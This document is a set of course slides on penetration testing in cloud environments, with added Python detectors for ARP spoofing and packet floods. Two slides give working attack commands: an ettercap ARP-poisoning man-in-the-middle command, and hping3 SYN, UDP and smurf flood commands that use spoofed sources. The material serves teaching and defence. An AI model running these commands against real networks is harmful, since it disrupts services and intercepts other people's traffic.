Slide 3
Penetration Testing
● “Wargames”
● Mimic real attacks
● Test IDS/firewall detection
● Test security
● How
● Typically simulate attacks in a “safe” environment
● Or, attack actual machines
● Use special software, e.g. Nessus, Metasploit, nmap, ...
Slide 5
Challenges on Cloud
● CSPs have good security
● But guests are your responsibility to protect
● Virtual
● No HW security appliances
● No low level access (grub)
● IP addresses may be ephemeral
● Some pen tests could be expensive
● Penetration tests cannot affect others
Slide 6
Private Cloud Security
● Can't attack from cloud with spoofed source address
● Infrastructure resilient to DDOS (LOTS of bandwidth)
● Cannot sniff other tenants' traffic
● You could be attacked by any of:
● Spoofing, portscan, MITM, DOS
Slide 8
Policies For Penetration Tests
● Most CSPs will grant permission for a window of time
● No DOS tests
● No tests on instances that share physical network
● On AWS, cannot use m1.small or t1.micro
● Some CSPs have slow responses to requests
Slide 11
Per-instance vulnerability tests
● Do not wish to affect other instances
● Want to observe an instance's traffic
● Run an IDS against a particular instance
Slide 13
Bridges
● Bonding? No, do not want to modify
● Can tap the interface with snort (run multiple snorts on host?)
● Could rate limit interfaces on bridges
● OpenStack allows rate limits or absolute limits on accounts
● tc – traffic shaper
Slide 15
Private Cloud Tenant
● Suppose wish to avoid network traffic
● How about attack from a container?
● IP address, MTU
● NAT for external connections
● “Ceiling” on container resources
● No “floor” / minimal guaranteed resources
● Skips external firewall!
Slide 16
Set up
● Kali – popular penetration testing distro
● Debian on Red Hat –
● 10.x.x.x subnet
● Import files (e.g. pcap)
[Diagram: docker bridge -> kali container; instance -> qbr.. (OpenStack bridge)]
sudo docker run --privileged pandrew/kali /bin/bash
Slide 19
Man in the Middle
● Ettercap
● Two machines, each with IP address
● Poison ARP table
● Simulate victim and middleman
Examples
apt-get install ettercap-text-only
ettercap -T -M ARP -j /tmp/hosts.txt -F html.ef /172.17.0.26/ //
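The ARP poisoning on this slide works by sending unsolicited ARP replies that re-map the victim's and the gateway's IP addresses to the middleman's MAC, so the tell-tale sign on the wire is an IP whose MAC suddenly changes, and one MAC that claims several IPs. The following detector is an added example, not part of the slides or of ettercap; it models what a host-side ARP monitor (arpwatch-style) does over a constructed list of ARP replies. The IPs come from the slide's command and the docker bridge; the MAC addresses, the `ArpReply` record and the alert names are assumptions made for the example.

```python
"""Detect ARP cache poisoning from a stream of ARP replies.

Added example: the replies below are constructed; a real monitor would
feed this from a capture on the bridge interface the victim is attached to.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float          # seconds since capture start
    sender_ip: str     # the "is-at" claim: sender_ip lives at sender_mac
    sender_mac: str


def detect_arp_spoof(replies, max_ips_per_mac=1):
    """Return a list of alerts.

    ("MAC_CHANGE", ip, old_mac, new_mac)   a known IP's MAC flipped
    ("MAC_CLAIMS_MANY", mac, ips)          one MAC now claims more than
                                           max_ips_per_mac distinct IPs
    Alerts are emitted once per change, not once per repeated reply
    (ettercap re-poisons periodically, so repeats are expected).
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for r in sorted(replies, key=lambda x: x.ts):
        prev = ip_to_mac.get(r.sender_ip)
        if prev is not None and prev != r.sender_mac:
            alerts.append(("MAC_CHANGE", r.sender_ip, prev, r.sender_mac))
        ip_to_mac[r.sender_ip] = r.sender_mac

        claimed = mac_to_ips[r.sender_mac]
        if r.sender_ip not in claimed:
            claimed.add(r.sender_ip)
            if len(claimed) > max_ips_per_mac:
                alerts.append(("MAC_CLAIMS_MANY", r.sender_mac,
                               tuple(sorted(claimed))))
    return alerts


# Constructed sample: gateway and victim answer normally, then a third MAC
# (the middleman) claims both addresses, as "-M ARP" does.
SAMPLE_REPLIES = [
    ArpReply(0.0, "172.17.42.1", "02:42:ac:11:2a:01"),   # gateway, legitimate
    ArpReply(0.5, "172.17.0.26", "02:42:ac:11:00:1a"),   # victim, legitimate
    ArpReply(5.0, "172.17.42.1", "02:42:ac:11:00:17"),   # middleman claims gateway
    ArpReply(5.1, "172.17.0.26", "02:42:ac:11:00:17"),   # middleman claims victim
    ArpReply(6.0, "172.17.42.1", "02:42:ac:11:00:17"),   # periodic re-poison
]

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_REPLIES):
        print(alert)
```

On the sample the detector raises two MAC_CHANGE alerts (gateway, then victim) and one MAC_CLAIMS_MANY alert for the middleman's MAC; the repeated poison at t=6.0 produces nothing new. In a cloud tenant this is the check worth running on the instance's own bridge port, since the slides note that the CSP will not let you sniff other tenants' traffic anyway.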
Slide 20
Denial of Service
● hping3 from docker container
● Cannot stress system
SYN attack to port 22
hping3 -c 10000 -d 120 -S -w 64 -p 22 --flood --rand-source -i eth0 172.17.42.1
Large UDP packets
hping3 --rand-source --udp --flood -d 8192 172.17.42.1
Smurf
sudo sysctl -w net.ipv4.icmp_echo_ignore_broadcasts=0
hping3 -1 --flood -a 172.17.0.23 172.17.255.255
● Max bandwidth test...
● DDOS
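Each of the three floods on this slide has a distinct signature an IDS on the instance's bridge port can key on: a burst of SYN-only segments to one port from many unrelated sources, a burst of near-MTU UDP datagrams, and ICMP echo requests addressed to the broadcast address (the smurf amplifier only works because the sysctl above turns off the Linux default `icmp_echo_ignore_broadcasts=1`; `net.ipv4.tcp_syncookies=1` is the corresponding kernel-side mitigation for the SYN case). The detector below is an added example, not from the slides or from hping3: it buckets constructed packet records into one-second windows and reports per-destination rates. The `Pkt` record, the thresholds and the sample traffic generator are assumptions made for the example; the addresses are the ones on the slide.

```python
"""Window-based flood detection over packet records (added example).

Input is a list of constructed Pkt records; in practice they would come
from a capture on the instance's bridge interface.
"""
import random
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float
    src: str
    dst: str
    proto: str          # "tcp", "udp" or "icmp"
    dport: int = 0
    flags: str = ""     # TCP flags: "S", "SA", "A"
    size: int = 0       # payload bytes
    icmp_type: int = -1  # 8 = echo request


def detect_floods(pkts, window=1.0, syn_thresh=100, udp_thresh=100, big_udp=1400):
    """Return findings per time bucket (bucket = int(ts // window)).

    ("SYN_FLOOD", bucket, dst, dport, syn_count, distinct_srcs)
    ("UDP_FLOOD", bucket, dst, large_udp_count)
    ("SMURF_AMPLIFICATION", bucket, src, dst, echo_request_count)
    The broadcast check (dst ends in ".255") is a heuristic for a /16 as
    on the slide; a real monitor would use the interface's broadcast address.
    """
    buckets = defaultdict(list)
    for p in pkts:
        buckets[int(p.ts // window)].append(p)

    findings = []
    for b in sorted(buckets):
        syns = defaultdict(list)   # (dst, dport) -> list of sources
        big = Counter()            # dst -> count of large UDP payloads
        bcast = Counter()          # (src, dst) -> echo requests to broadcast
        for p in buckets[b]:
            if p.proto == "tcp" and p.flags == "S":
                syns[(p.dst, p.dport)].append(p.src)
            elif p.proto == "udp" and p.size >= big_udp:
                big[p.dst] += 1
            elif p.proto == "icmp" and p.icmp_type == 8 and p.dst.endswith(".255"):
                bcast[(p.src, p.dst)] += 1
        for (dst, dport), srcs in syns.items():
            if len(srcs) >= syn_thresh:
                findings.append(("SYN_FLOOD", b, dst, dport, len(srcs), len(set(srcs))))
        for dst, n in big.items():
            if n >= udp_thresh:
                findings.append(("UDP_FLOOD", b, dst, n))
        for (src, dst), n in bcast.items():
            findings.append(("SMURF_AMPLIFICATION", b, src, dst, n))
    return findings


def build_sample(seed=1):
    """Constructed traffic: benign handshakes, then the slide's three floods."""
    rng = random.Random(seed)

    def rand_ip():
        return "%d.%d.%d.%d" % tuple(rng.randrange(1, 255) for _ in range(4))

    pkts = []
    for i in range(3):                     # second 0: three normal SSH handshakes
        t = 0.1 * i
        pkts += [Pkt(t, "172.17.0.5", "172.17.42.1", "tcp", 22, "S"),
                 Pkt(t + 0.01, "172.17.42.1", "172.17.0.5", "tcp", 0, "SA"),
                 Pkt(t + 0.02, "172.17.0.5", "172.17.42.1", "tcp", 22, "A")]
    for i in range(300):                   # second 1: SYN flood, random sources
        pkts.append(Pkt(1.0 + i / 300, rand_ip(), "172.17.42.1", "tcp", 22, "S"))
    for i in range(150):                   # second 2: 8192-byte UDP flood
        pkts.append(Pkt(2.0 + i / 150, rand_ip(), "172.17.42.1", "udp",
                        rng.randrange(1024, 65535), "", 8192))
    for i in range(50):                    # second 3: spoofed echo to broadcast
        pkts.append(Pkt(3.0 + i / 50, "172.17.0.23", "172.17.255.255", "icmp",
                        icmp_type=8))
    return pkts


if __name__ == "__main__":
    for f in detect_floods(build_sample()):
        print(f)
```

The benign handshakes in second 0 stay below the SYN threshold and produce no finding; the three later windows each yield exactly one finding. The distinct-source count on the SYN finding is what separates `--rand-source` traffic from a single misbehaving client, and is the figure to compare against the instance's normal connection rate before settling on `syn_thresh`.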